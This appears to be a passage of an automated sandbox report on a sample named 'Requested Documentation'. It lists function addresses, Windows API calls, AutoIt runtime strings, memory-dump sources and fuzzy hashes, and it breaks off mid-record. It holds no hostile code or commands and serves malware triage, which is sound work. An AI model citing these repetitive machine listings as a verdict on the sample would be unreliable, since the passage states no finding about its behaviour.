                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Type$Register$FileLoadModuleNameUser
                                                                              • String ID:
                                                                              • API String ID: 1352324309-0
                                                                              • Opcode ID: adc1f20931c121e541466aa35885f8cbd196d222fc0fa0bb879f987756aa520d
                                                                              • Instruction ID: 7fd32b1755433696e023a5296654f34b1d4cdcbdb37fa42a4c1e1212d2776197
                                                                              • Opcode Fuzzy Hash: adc1f20931c121e541466aa35885f8cbd196d222fc0fa0bb879f987756aa520d
                                                                              • Instruction Fuzzy Hash: 6C116575646308DFE331CF94DC48F93BBBCEB00700F10896AA915D6550D7B5E546EBA1
                                                                              Function 009B6FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                              • String ID:
                                                                              • API String ID: 3016257755-0
                                                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                              • Instruction ID: 1a11424568091cfec1c0c9b6414b1e0fd5e40868293d1d6befb264a9a9386512
                                                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                              • Instruction Fuzzy Hash: 02017E3204814EBBCF126EC4CD01CED7F66BB98360F498616FA1868030C236C9B1AB91
                                                                              Function 00A0B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 00A0B2E4
                                                                              • ScreenToClient.USER32(?,?), ref: 00A0B2FC
                                                                              • ScreenToClient.USER32(?,?), ref: 00A0B320
                                                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A0B33B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                                              • String ID:
                                                                              • API String ID: 357397906-0
                                                                              • Opcode ID: 13014001c97a64173334ccacddc3096b7c71f2766e287ff7b3ef107994e71587
                                                                              • Instruction ID: 62fa0eee2c9c334792b84a67f4ac87e4048ed4c798fe247a38bb332b3ef1faae
                                                                              • Opcode Fuzzy Hash: 13014001c97a64173334ccacddc3096b7c71f2766e287ff7b3ef107994e71587
                                                                              • Instruction Fuzzy Hash: 8D1163B9D0024DEFDB11CFA9D8849EEBBB9FB08310F108166E914E3620D735AA518F51
                                                                              Function 00A0B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00A0B644
                                                                              • _memset.LIBCMT ref: 00A0B653
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00A46F20,00A46F64), ref: 00A0B682
                                                                              • CloseHandle.KERNEL32 ref: 00A0B694
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$CloseCreateHandleProcess
                                                                              • String ID:
                                                                              • API String ID: 3277943733-0
                                                                              • Opcode ID: 360af1d800f87d822886b67d25a329e1eec5234918932587bffd1b353807907d
                                                                              • Instruction ID: efe730257e494b2adfe2a56f58836e14b600d5935a5422216837e2d914a41d95
                                                                              • Opcode Fuzzy Hash: 360af1d800f87d822886b67d25a329e1eec5234918932587bffd1b353807907d
                                                                              • Instruction Fuzzy Hash: 1CF054B95403047FE21067A57C05F7B3A5CEB47755F004020BA48E9592D7774C0687AA
                                                                              Function 009E6BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(?), ref: 009E6BE6
                                                                                • Part of subcall function 009E76C4: _memset.LIBCMT ref: 009E76F9
                                                                              • _memmove.LIBCMT ref: 009E6C09
                                                                              • _memset.LIBCMT ref: 009E6C16
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 009E6C26
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                              • String ID:
                                                                              • API String ID: 48991266-0
                                                                              • Opcode ID: ea2a1482d5ab716ca7f73980f98199b968361b57ac0a8bec7f062ac0c93c7a38
                                                                              • Instruction ID: c5d5c15d2ca902f306ea9837692a2f3923ea8f7836cec8ac97108e83b6596728
                                                                              • Opcode Fuzzy Hash: ea2a1482d5ab716ca7f73980f98199b968361b57ac0a8bec7f062ac0c93c7a38
                                                                              • Instruction Fuzzy Hash: 84F05B3A1001046BCF016F95DC85B86BB25EF85324F048061FD085E157C732D812DBB5
                                                                              Function 00982218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSysColor.USER32(00000008), ref: 00982231
                                                                              • SetTextColor.GDI32(?,000000FF), ref: 0098223B
                                                                              • SetBkMode.GDI32(?,00000001), ref: 00982250
                                                                              • GetStockObject.GDI32(00000005), ref: 00982258
                                                                              • GetWindowDC.USER32(?,00000000), ref: 009BBE83
                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 009BBE90
                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 009BBEA9
                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 009BBEC2
                                                                              • GetPixel.GDI32(00000000,?,?), ref: 009BBEE2
                                                                              • ReleaseDC.USER32(?,00000000), ref: 009BBEED
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                              • String ID:
                                                                              • API String ID: 1946975507-0
                                                                              • Opcode ID: d5a974c30eaec418828999e35400bce1c3731f84b63b84ca9c24af5c72f72cf2
                                                                              • Instruction ID: 83f0fbb281a0301fdc0d9e4940a60351ce009cc5eab552f641ccba5a506df18b
                                                                              • Opcode Fuzzy Hash: d5a974c30eaec418828999e35400bce1c3731f84b63b84ca9c24af5c72f72cf2
                                                                              • Instruction Fuzzy Hash: 78E03932104248AEDF219FA4EC0D7D83B14EB05332F008366FB69680E187B14992DB12
                                                                              Function 009D8712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentThread.KERNEL32 ref: 009D871B
                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,009D82E6), ref: 009D8722
                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009D82E6), ref: 009D872F
                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,009D82E6), ref: 009D8736
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentOpenProcessThreadToken
                                                                              • String ID:
                                                                              • API String ID: 3974789173-0
                                                                              • Opcode ID: 55d39ca1f2a4b20607fe4cd5b08764a8a52564bc8374b7faf3f4b7e82e532c30
                                                                              • Instruction ID: 30e48e760e8bd4d2205f5a34404feebe970e6fd23ba4e76d3f323ee0de869a8f
                                                                              • Opcode Fuzzy Hash: 55d39ca1f2a4b20607fe4cd5b08764a8a52564bc8374b7faf3f4b7e82e532c30
                                                                              • Instruction Fuzzy Hash: E8E086366512159FD7309FF45D0CB9B3BACEF54791F148828B645EA041EA348443C750
                                                                              Function 009DB2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 009DB4BE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ContainedObject
                                                                              • String ID: AutoIt3GUI$Container
                                                                              • API String ID: 3565006973-3941886329
                                                                              • Opcode ID: e1299ff0a044427d47a483a8c4e1e0617814de23829a90da78f2001f78ab56cf
                                                                              • Instruction ID: c613417d08890c5533d0cf8db5ccbbc83279177aab5ad6d9cd4721b09b579b9e
                                                                              • Opcode Fuzzy Hash: e1299ff0a044427d47a483a8c4e1e0617814de23829a90da78f2001f78ab56cf
                                                                              • Instruction Fuzzy Hash: 8A912770640601EFDB14DF64C884B6AB7E9FF49710F21856EF94A8B3A1DB70E841CB50
                                                                              Function 009EAFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0099FC86: _wcscpy.LIBCMT ref: 0099FCA9
                                                                                • Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
                                                                                • Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC
                                                                              • __wcsnicmp.LIBCMT ref: 009EB02D
                                                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 009EB0F6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                              • String ID: LPT
                                                                              • API String ID: 3222508074-1350329615
                                                                              • Opcode ID: dfa6be7ef6413b625e1c80382d1d907d0e1e3c162433d66983eb527094116bab
                                                                              • Instruction ID: af74e475dfbf55f99642a8117902be157e998f780e4e277f79a5c7ce51953320
                                                                              • Opcode Fuzzy Hash: dfa6be7ef6413b625e1c80382d1d907d0e1e3c162433d66983eb527094116bab
                                                                              • Instruction Fuzzy Hash: 8F619071A04219AFCB15EF99C891EBFB7B8EF48310F144069F916AB391D730AE44CB90
                                                                              Function 00992957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000), ref: 00992968
                                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00992981
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalMemorySleepStatus
                                                                              • String ID: @
                                                                              • API String ID: 2783356886-2766056989
                                                                              • Opcode ID: 392f118c16f1a64b2e050858113462e3349091de8d15ad63c203b37d3c098f2d
                                                                              • Instruction ID: 4ab09f4b907352f049df01940d84c8604c31712ef8db69e13532d7d81a9c91e1
                                                                              • Opcode Fuzzy Hash: 392f118c16f1a64b2e050858113462e3349091de8d15ad63c203b37d3c098f2d
                                                                              • Instruction Fuzzy Hash: A55147714087449BD320EF54D886BAFBBE8FBC5344F81885DF2D9411A1DB30856ACB66
                                                                              Function 009E9734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00984F0B: __fread_nolock.LIBCMT ref: 00984F29
                                                                              • _wcscmp.LIBCMT ref: 009E9824
                                                                              • _wcscmp.LIBCMT ref: 009E9837
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscmp$__fread_nolock
                                                                              • String ID: FILE
                                                                              • API String ID: 4029003684-3121273764
                                                                              • Opcode ID: 119c821da52bec2286c5c76ba64a3c157f5960661ae5cc885fd5b3ad82321f34
                                                                              • Instruction ID: cc5ce72e8f0bce7ade5b5b3a0120fc05a2410b8675aeaed6543ed79486aa6e24
                                                                              • Opcode Fuzzy Hash: 119c821da52bec2286c5c76ba64a3c157f5960661ae5cc885fd5b3ad82321f34
                                                                              • Instruction Fuzzy Hash: 9341D971A0424ABADF21ABA5CC45FEFB7BDDF86710F004469FA04E7181D7719D048BA1
                                                                              Function 009F258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009F259E
                                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009F25D4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CrackInternet_memset
                                                                              • String ID: |
                                                                              • API String ID: 1413715105-2343686810
                                                                              • Opcode ID: 0393e5ad73a795f9aadcb45a656d215abefa702ea9a1ea033fb10ffd4653f0d9
                                                                              • Instruction ID: 0f13c550f9483db0f41286bc60cb619971cfdcf09c47051050ce68354d82906f
                                                                              • Opcode Fuzzy Hash: 0393e5ad73a795f9aadcb45a656d215abefa702ea9a1ea033fb10ffd4653f0d9
                                                                              • Instruction Fuzzy Hash: D4311B71804119EBCF11EFA4CC85EEEBFB8FF48310F10006AF915A6262EB359956DB60
                                                                              Function 00A07A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00A07B61
                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A07B76
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: '
                                                                              • API String ID: 3850602802-1997036262
                                                                              • Opcode ID: 04e964c63d75ecb68e55210ace6f30a0de0e505762cdd3dfb7bf862bdd03cfc4
                                                                              • Instruction ID: a38146571ff81c0340e434a196ac27d743e6c7e2b6f66b19b29da69335563c84
                                                                              • Opcode Fuzzy Hash: 04e964c63d75ecb68e55210ace6f30a0de0e505762cdd3dfb7bf862bdd03cfc4
                                                                              • Instruction Fuzzy Hash: 8541E674E0520E9FDB14CF68D981BEEBBB5FB09340F10416AE905AB391D771A952CFA0
                                                                              Function 00A06A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,?,?,?), ref: 00A06B17
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00A06B53
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$DestroyMove
                                                                              • String ID: static
                                                                              • API String ID: 2139405536-2160076837
                                                                              • Opcode ID: 80b0c3863a0ee4a2a0ac7ac24a79f298828fe908dee66d6c6aa2149efa1a521f
                                                                              • Instruction ID: 14fa6e87b5a767d09ed448dd413e44bcebfc0a3fa67906213b6a0ba3485dd3b1
                                                                              • Opcode Fuzzy Hash: 80b0c3863a0ee4a2a0ac7ac24a79f298828fe908dee66d6c6aa2149efa1a521f
                                                                              • Instruction Fuzzy Hash: CF317E71210608AEDB10DF64DC81BFB77B9FF89764F108619F9A5D7190DA31AC92C760
                                                                              Function 009E28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009E2911
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009E294C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: InfoItemMenu_memset
                                                                              • String ID: 0
                                                                              • API String ID: 2223754486-4108050209
                                                                              • Opcode ID: c990ac04a39c98b602c8d860baf783c30b974787a9327af82802d90accce4d4f
                                                                              • Instruction ID: 2c2f809a087a3ab33b52ff269650cfdb66094e5ce6966f812b3396ce555e1758
                                                                              • Opcode Fuzzy Hash: c990ac04a39c98b602c8d860baf783c30b974787a9327af82802d90accce4d4f
                                                                              • Instruction Fuzzy Hash: 99312B755003459FDF26CF5ACE45BAEBBFCEF45350F141029E885A61A2DB709D40CB51
                                                                              Function 009F39E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __snwprintf.LIBCMT ref: 009F3A66
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: __snwprintf_memmove
                                                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                                                              • API String ID: 3506404897-2584243854
                                                                              • Opcode ID: 1f8c0ffb5a542d0323259e5eb7d38f6848f00332f678a26e4358d9017cedcdce
                                                                              • Instruction ID: d4b45604550065f2fb07e3cc048c0b8370563c7586eb4a21600417a93b84f09f
                                                                              • Opcode Fuzzy Hash: 1f8c0ffb5a542d0323259e5eb7d38f6848f00332f678a26e4358d9017cedcdce
                                                                              • Instruction Fuzzy Hash: AC214171600219AFCF10EFA5CC81FAEBBB5BF85700F504455F545A7282DB38EA45CB61
                                                                              Function 00A066D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A06761
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A0676C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
